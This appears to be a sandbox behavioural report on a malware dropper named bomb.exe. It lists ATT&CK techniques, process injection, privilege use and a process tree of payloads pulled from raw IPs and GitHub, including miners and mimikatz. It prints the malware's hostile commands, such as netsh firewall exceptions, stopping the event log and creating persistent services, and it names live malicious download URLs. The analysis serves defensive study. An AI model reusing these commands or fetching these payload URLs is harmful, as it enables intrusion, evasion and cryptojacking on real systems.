Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httpsgithub.comBARHOM1brobrrawmainWindowsServices.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysnldcvmr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	http196.251.92.64cryptBREMCOS.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httptwizt.netnewtpp.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	http185.215.113.66klmnr.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	http196.251.92.64reshDevil2.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WindowsServices.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httpsgithub.comLean789ruehtrawrefsheadsmainDpose.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	http185.215.113.66pei.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	148956848.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysnldcvmr.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
5440	PING.EXE
6780	cmd.exe

NSIS installer 2 IoCs

installer

resource	yara_rule
behavioral2/files/0x0008000000023ddc-8129.dat	nsis_installer_1
behavioral2/files/0x0008000000023ddc-8129.dat	nsis_installer_2

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	dwm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags	dwm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	dwm.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
8480	WMIC.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	dwm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	dwm.exe

Kills process with taskkill 12 IoCs

defense_evasion

pid	Process
6656	taskkill.exe
7620	taskkill.exe
9128	taskkill.exe
3056	taskkill.exe
8792	taskkill.exe
7188	taskkill.exe
6572	taskkill.exe
1592	taskkill.exe
2636	taskkill.exe
3312	taskkill.exe
1384	taskkill.exe
8716	taskkill.exe

Modifies data under HKEY_USERS 18 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	dwm.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
5904	reg.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
5440	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4200	schtasks.exe
512	schtasks.exe
1072	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4780	http185.215.113.66minedelll.exe.exe
3500	http185.215.113.66del1.exe.exe
3500	http185.215.113.66del1.exe.exe
908	http185.215.113.66xmin.exe.exe
908	http185.215.113.66xmin.exe.exe
908	http185.215.113.66xmin.exe.exe
908	http185.215.113.66xmin.exe.exe
3348	winuspdt.exe
3348	winuspdt.exe
4968	conhost.exe
4968	conhost.exe
968	http185.215.113.66xmrminer.exe.exe
5008	http185.215.113.66del2.exe.exe
5008	http185.215.113.66del2.exe.exe
968	http185.215.113.66xmrminer.exe.exe
4428	svchost.exe
4428	svchost.exe
4428	svchost.exe
4428	svchost.exe
4428	svchost.exe
4428	svchost.exe
4428	svchost.exe
4428	svchost.exe
968	http185.215.113.66xmrminer.exe.exe
4428	svchost.exe
4428	svchost.exe
4428	svchost.exe
4428	svchost.exe
968	http185.215.113.66xmrminer.exe.exe
4428	svchost.exe
4428	svchost.exe
4428	svchost.exe
4428	svchost.exe
4428	svchost.exe
4428	svchost.exe
4428	svchost.exe
4428	svchost.exe
4428	svchost.exe
4428	svchost.exe
4428	svchost.exe
4428	svchost.exe
4428	svchost.exe
4428	svchost.exe
4428	svchost.exe
4428	svchost.exe
4428	svchost.exe
4428	svchost.exe
4428	svchost.exe
4428	svchost.exe
5544	wincsupdt.exe
4428	svchost.exe
4428	svchost.exe
4428	svchost.exe
4428	svchost.exe
5544	wincsupdt.exe
4428	svchost.exe
4428	svchost.exe
4428	svchost.exe
4428	svchost.exe
4428	svchost.exe
4428	svchost.exe
4428	svchost.exe
4428	svchost.exe
4428	svchost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4940	bomb.exe
Token: SeDebugPrivilege	4780	http185.215.113.66minedelll.exe.exe
Token: SeDebugPrivilege	3500	http185.215.113.66del1.exe.exe
Token: SeDebugPrivilege	3056	taskkill.exe
Token: SeDebugPrivilege	1384	taskkill.exe
Token: SeDebugPrivilege	1592	taskkill.exe
Token: SeDebugPrivilege	2636	taskkill.exe
Token: SeDebugPrivilege	3312	taskkill.exe
Token: SeLockMemoryPrivilege	1800	dwm.exe
Token: SeDebugPrivilege	4968	conhost.exe
Token: SeDebugPrivilege	5008	http185.215.113.66del2.exe.exe
Token: SeCreateGlobalPrivilege	2296	dwm.exe
Token: SeChangeNotifyPrivilege	2296	dwm.exe
Token: 33	2296	dwm.exe
Token: SeIncBasePriorityPrivilege	2296	dwm.exe
Token: SeDebugPrivilege	4428	svchost.exe
Token: SeLockMemoryPrivilege	5692	notepad.exe
Token: SeDebugPrivilege	3124	httpsgithub.comLean789ruehtrawrefsheadsmainDpose.exe.exe
Token: SeDebugPrivilege	3124	httpsgithub.comLean789ruehtrawrefsheadsmainDpose.exe.exe
Token: SeDebugPrivilege	3124	httpsgithub.comLean789ruehtrawrefsheadsmainDpose.exe.exe
Token: SeDebugPrivilege	3124	httpsgithub.comLean789ruehtrawrefsheadsmainDpose.exe.exe
Token: SeDebugPrivilege	3124	httpsgithub.comLean789ruehtrawrefsheadsmainDpose.exe.exe
Token: SeDebugPrivilege	5244	httpsgithub.comLean789ruehtrawrefsheadsmainmimikatz.exe.exe
Token: 33	4428	svchost.exe
Token: SeIncBasePriorityPrivilege	4428	svchost.exe
Token: SeIncBasePriorityPrivilege	5364	httpsgithub.comLean789ruehtrawrefsheadsmaintoyour.exe.exe
Token: SeDebugPrivilege	5244	httpsgithub.comLean789ruehtrawrefsheadsmainmimikatz.exe.exe
Token: SeDebugPrivilege	5244	httpsgithub.comLean789ruehtrawrefsheadsmainmimikatz.exe.exe
Token: SeDebugPrivilege	5244	httpsgithub.comLean789ruehtrawrefsheadsmainmimikatz.exe.exe
Token: SeDebugPrivilege	4404	WindowsServices.exe
Token: SeIncreaseQuotaPrivilege	6080	wmic.exe
Token: SeSecurityPrivilege	6080	wmic.exe
Token: SeTakeOwnershipPrivilege	6080	wmic.exe
Token: SeLoadDriverPrivilege	6080	wmic.exe
Token: SeSystemProfilePrivilege	6080	wmic.exe
Token: SeSystemtimePrivilege	6080	wmic.exe
Token: SeProfSingleProcessPrivilege	6080	wmic.exe
Token: SeIncBasePriorityPrivilege	6080	wmic.exe
Token: SeCreatePagefilePrivilege	6080	wmic.exe
Token: SeBackupPrivilege	6080	wmic.exe
Token: SeRestorePrivilege	6080	wmic.exe
Token: SeShutdownPrivilege	6080	wmic.exe
Token: SeDebugPrivilege	6080	wmic.exe
Token: SeSystemEnvironmentPrivilege	6080	wmic.exe
Token: SeRemoteShutdownPrivilege	6080	wmic.exe
Token: SeUndockPrivilege	6080	wmic.exe
Token: SeManageVolumePrivilege	6080	wmic.exe
Token: 33	6080	wmic.exe
Token: 34	6080	wmic.exe
Token: 35	6080	wmic.exe
Token: 36	6080	wmic.exe
Token: SeDebugPrivilege	3056	powershell.exe
Token: SeDebugPrivilege	5776	http196.251.92.64reshClient.exe.exe
Token: SeIncreaseQuotaPrivilege	6080	wmic.exe
Token: SeSecurityPrivilege	6080	wmic.exe
Token: SeTakeOwnershipPrivilege	6080	wmic.exe
Token: SeLoadDriverPrivilege	6080	wmic.exe
Token: SeSystemProfilePrivilege	6080	wmic.exe
Token: SeSystemtimePrivilege	6080	wmic.exe
Token: SeProfSingleProcessPrivilege	6080	wmic.exe
Token: SeIncBasePriorityPrivilege	6080	wmic.exe
Token: SeCreatePagefilePrivilege	6080	wmic.exe
Token: SeBackupPrivilege	6080	wmic.exe
Token: SeRestorePrivilege	6080	wmic.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
6256	http196.251.92.64cryptBREMCOS.exe.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4940 wrote to memory of 3624	4940	bomb.exe	88
PID 4940 wrote to memory of 3624	4940	bomb.exe	88
PID 4940 wrote to memory of 3624	4940	bomb.exe	88
PID 4940 wrote to memory of 1696	4940	bomb.exe	87
PID 4940 wrote to memory of 1696	4940	bomb.exe	87
PID 4940 wrote to memory of 1696	4940	bomb.exe	87
PID 4940 wrote to memory of 1920	4940	bomb.exe	89
PID 4940 wrote to memory of 1920	4940	bomb.exe	89
PID 4940 wrote to memory of 1920	4940	bomb.exe	89
PID 4940 wrote to memory of 3648	4940	bomb.exe	90
PID 4940 wrote to memory of 3648	4940	bomb.exe	90
PID 4940 wrote to memory of 3648	4940	bomb.exe	90
PID 4940 wrote to memory of 808	4940	bomb.exe	91
PID 4940 wrote to memory of 808	4940	bomb.exe	91
PID 4940 wrote to memory of 808	4940	bomb.exe	91
PID 1696 wrote to memory of 2056	1696	http185.215.113.66pei.exe.exe	96
PID 1696 wrote to memory of 2056	1696	http185.215.113.66pei.exe.exe	96
PID 1696 wrote to memory of 2056	1696	http185.215.113.66pei.exe.exe	96
PID 3648 wrote to memory of 4420	3648	httptwizt.netnewtpp.exe.exe	97
PID 3648 wrote to memory of 4420	3648	httptwizt.netnewtpp.exe.exe	97
PID 3648 wrote to memory of 4420	3648	httptwizt.netnewtpp.exe.exe	97
PID 4940 wrote to memory of 908	4940	bomb.exe	98
PID 4940 wrote to memory of 908	4940	bomb.exe	98
PID 4940 wrote to memory of 2464	4940	bomb.exe	99
PID 4940 wrote to memory of 2464	4940	bomb.exe	99
PID 4940 wrote to memory of 2464	4940	bomb.exe	99
PID 2056 wrote to memory of 372	2056	148956848.exe	100
PID 2056 wrote to memory of 372	2056	148956848.exe	100
PID 2056 wrote to memory of 372	2056	148956848.exe	100
PID 4940 wrote to memory of 2580	4940	bomb.exe	101
PID 4940 wrote to memory of 2580	4940	bomb.exe	101
PID 4940 wrote to memory of 4780	4940	bomb.exe	102
PID 4940 wrote to memory of 4780	4940	bomb.exe	102
PID 1920 wrote to memory of 4404	1920	httpsgithub.comBARHOM1brobrrawmainWindowsServices.exe.exe	103
PID 1920 wrote to memory of 4404	1920	httpsgithub.comBARHOM1brobrrawmainWindowsServices.exe.exe	103
PID 1920 wrote to memory of 4404	1920	httpsgithub.comBARHOM1brobrrawmainWindowsServices.exe.exe	103
PID 4780 wrote to memory of 436	4780	http185.215.113.66minedelll.exe.exe	104
PID 4780 wrote to memory of 436	4780	http185.215.113.66minedelll.exe.exe	104
PID 4940 wrote to memory of 3500	4940	bomb.exe	106
PID 4940 wrote to memory of 3500	4940	bomb.exe	106
PID 3624 wrote to memory of 4428	3624	httpsraw.githubusercontent.comgamingdued123UeukFImainclientside.exe.exe	107
PID 3624 wrote to memory of 4428	3624	httpsraw.githubusercontent.comgamingdued123UeukFImainclientside.exe.exe	107
PID 3624 wrote to memory of 4428	3624	httpsraw.githubusercontent.comgamingdued123UeukFImainclientside.exe.exe	107
PID 436 wrote to memory of 3884	436	cmd.exe	108
PID 436 wrote to memory of 3884	436	cmd.exe	108
PID 436 wrote to memory of 2888	436	cmd.exe	109
PID 436 wrote to memory of 2888	436	cmd.exe	109
PID 3500 wrote to memory of 1968	3500	http185.215.113.66del1.exe.exe	110
PID 3500 wrote to memory of 1968	3500	http185.215.113.66del1.exe.exe	110
PID 1968 wrote to memory of 3432	1968	cmd.exe	112
PID 1968 wrote to memory of 3432	1968	cmd.exe	112
PID 1968 wrote to memory of 4452	1968	cmd.exe	113
PID 1968 wrote to memory of 4452	1968	cmd.exe	113
PID 2464 wrote to memory of 3784	2464	http185.215.113.66mindelnew.exe.exe	118
PID 2464 wrote to memory of 3784	2464	http185.215.113.66mindelnew.exe.exe	118
PID 2464 wrote to memory of 3784	2464	http185.215.113.66mindelnew.exe.exe	118
PID 2464 wrote to memory of 4028	2464	http185.215.113.66mindelnew.exe.exe	123
PID 2464 wrote to memory of 4028	2464	http185.215.113.66mindelnew.exe.exe	123
PID 2464 wrote to memory of 4028	2464	http185.215.113.66mindelnew.exe.exe	123
PID 2464 wrote to memory of 2188	2464	http185.215.113.66mindelnew.exe.exe	124
PID 2464 wrote to memory of 2188	2464	http185.215.113.66mindelnew.exe.exe	124
PID 2464 wrote to memory of 2188	2464	http185.215.113.66mindelnew.exe.exe	124
PID 2464 wrote to memory of 3780	2464	http185.215.113.66mindelnew.exe.exe	127
PID 2464 wrote to memory of 3780	2464	http185.215.113.66mindelnew.exe.exe	127

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
7368	attrib.exe

C:\Users\Admin\AppData\Local\Temp\bomb.exe
"C:\Users\Admin\AppData\Local\Temp\bomb.exe"
1⤵
- Downloads MZ/PE file
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4940
- C:\Users\Admin\AppData\Local\Temp\http185.215.113.66pei.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http185.215.113.66pei.exe.exe"
  2⤵
  - Downloads MZ/PE file
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1696
- - C:\Users\Admin\AppData\Local\Temp\148956848.exe
    C:\Users\Admin\AppData\Local\Temp\148956848.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2056
  - - C:\Users\Admin\sysnldcvmr.exe
      C:\Users\Admin\sysnldcvmr.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:372
    - - C:\Users\Admin\AppData\Local\Temp\2868321237.exe
        
        C:\Users\Admin\AppData\Local\Temp\2868321237.exe
        5⤵
        
        PID:2744
    - - C:\Users\Admin\AppData\Local\Temp\765228982.exe
        
        C:\Users\Admin\AppData\Local\Temp\765228982.exe
        5⤵
        
        PID:6284
- C:\Users\Admin\AppData\Local\Temp\httpsraw.githubusercontent.comgamingdued123UeukFImainclientside.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsraw.githubusercontent.comgamingdued123UeukFImainclientside.exe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3624
- - C:\Windows\svchost.exe
    "C:\Windows\svchost.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops autorun.inf file
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4428
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Windows\svchost.exe" "svchost.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      PID:1196
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
      dw20.exe -x -s 1296
      4⤵
      PID:5968
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comBARHOM1brobrrawmainWindowsServices.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comBARHOM1brobrrawmainWindowsServices.exe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1920
- - C:\Windows\WindowsServices.exe
    "C:\Windows\WindowsServices.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:4404
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Windows\WindowsServices.exe" "WindowsServices.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      PID:4872
- C:\Users\Admin\AppData\Local\Temp\httptwizt.netnewtpp.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httptwizt.netnewtpp.exe.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3648
- - C:\Windows\sysnldcvmr.exe
    C:\Windows\sysnldcvmr.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4420
- C:\Users\Admin\AppData\Local\Temp\http185.215.113.75filesLisan7random.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http185.215.113.75filesLisan7random.exe.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:808
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 808 -s 852
    3⤵
    - Program crash
    PID:4672
- C:\Users\Admin\AppData\Local\Temp\http185.215.113.66xmin.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http185.215.113.66xmin.exe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:908
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "WinUpla"
    3⤵
    - Launches sc.exe
    PID:4972
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "WinUpla" binpath= "C:\ProgramData\WinUpla\winuspdt.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:3320
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:1220
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "WinUpla"
    3⤵
    - Launches sc.exe
    PID:1864
- C:\Users\Admin\AppData\Local\Temp\http185.215.113.66mindelnew.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http185.215.113.66mindelnew.exe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2464
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /Delete /TN "Microsoft Windows Security" /F
    3⤵
    - Indicator Removal: Clear Persistence
    - System Location Discovery: System Language Discovery
    PID:3784
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Delete /TN "Microsoft Windows Security" /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:1084
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /F /IM dwm.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4028
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM dwm.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3056
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2188
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM conhost.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3312
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3780
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM conhost.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1592
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3316
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM conhost.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2636
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2384
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM conhost.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1384
- C:\Users\Admin\AppData\Local\Temp\http185.215.113.66del3.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http185.215.113.66del3.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:2580
- - C:\Windows\System32\conhost.exe
    "C:\Windows\System32\conhost.exe" ""
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4968
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "winsrvcs" & exit
      4⤵
      PID:376
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "winsrvcs"
        5⤵
        
        PID:2192
- C:\Users\Admin\AppData\Local\Temp\http185.215.113.66minedelll.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http185.215.113.66minedelll.exe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4780
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c sc delete "WinUpdt" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinUpdt" /f
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:436
  - - C:\Windows\system32\sc.exe
      sc delete "WinUpdt"
      4⤵
      Launches sc.exe
      PID:3884
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinUpdt" /f
      4⤵
      PID:2888
- C:\Users\Admin\AppData\Local\Temp\http185.215.113.66del1.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http185.215.113.66del1.exe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3500
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c sc delete "Windows Services" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Windows Services" /f
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1968
  - - C:\Windows\system32\sc.exe
      sc delete "Windows Services"
      4⤵
      Launches sc.exe
      PID:3432
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Windows Services" /f
      4⤵
      PID:4452
- C:\Users\Admin\AppData\Local\Temp\http185.215.113.66xmrminer.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http185.215.113.66xmrminer.exe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:968
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "WinUpdt"
    3⤵
    - Launches sc.exe
    PID:4956
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "WinUpdt" binpath= "C:\ProgramData\WinUpdt\wincsupdt.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:740
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:5280
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "WinUpdt"
    3⤵
    - Launches sc.exe
    PID:5296
- C:\Users\Admin\AppData\Local\Temp\http185.215.113.66del2.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http185.215.113.66del2.exe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5008
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c sc delete "WinSvcs" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinSvcs" /f
    3⤵
    PID:1556
  - - C:\Windows\system32\sc.exe
      sc delete "WinSvcs"
      4⤵
      Launches sc.exe
      PID:6068
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinSvcs" /f
      4⤵
      PID:740
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmainBootxr.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmainBootxr.exe.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  PID:4972
- - C:\Windows\SysWOW64\cmd.exe
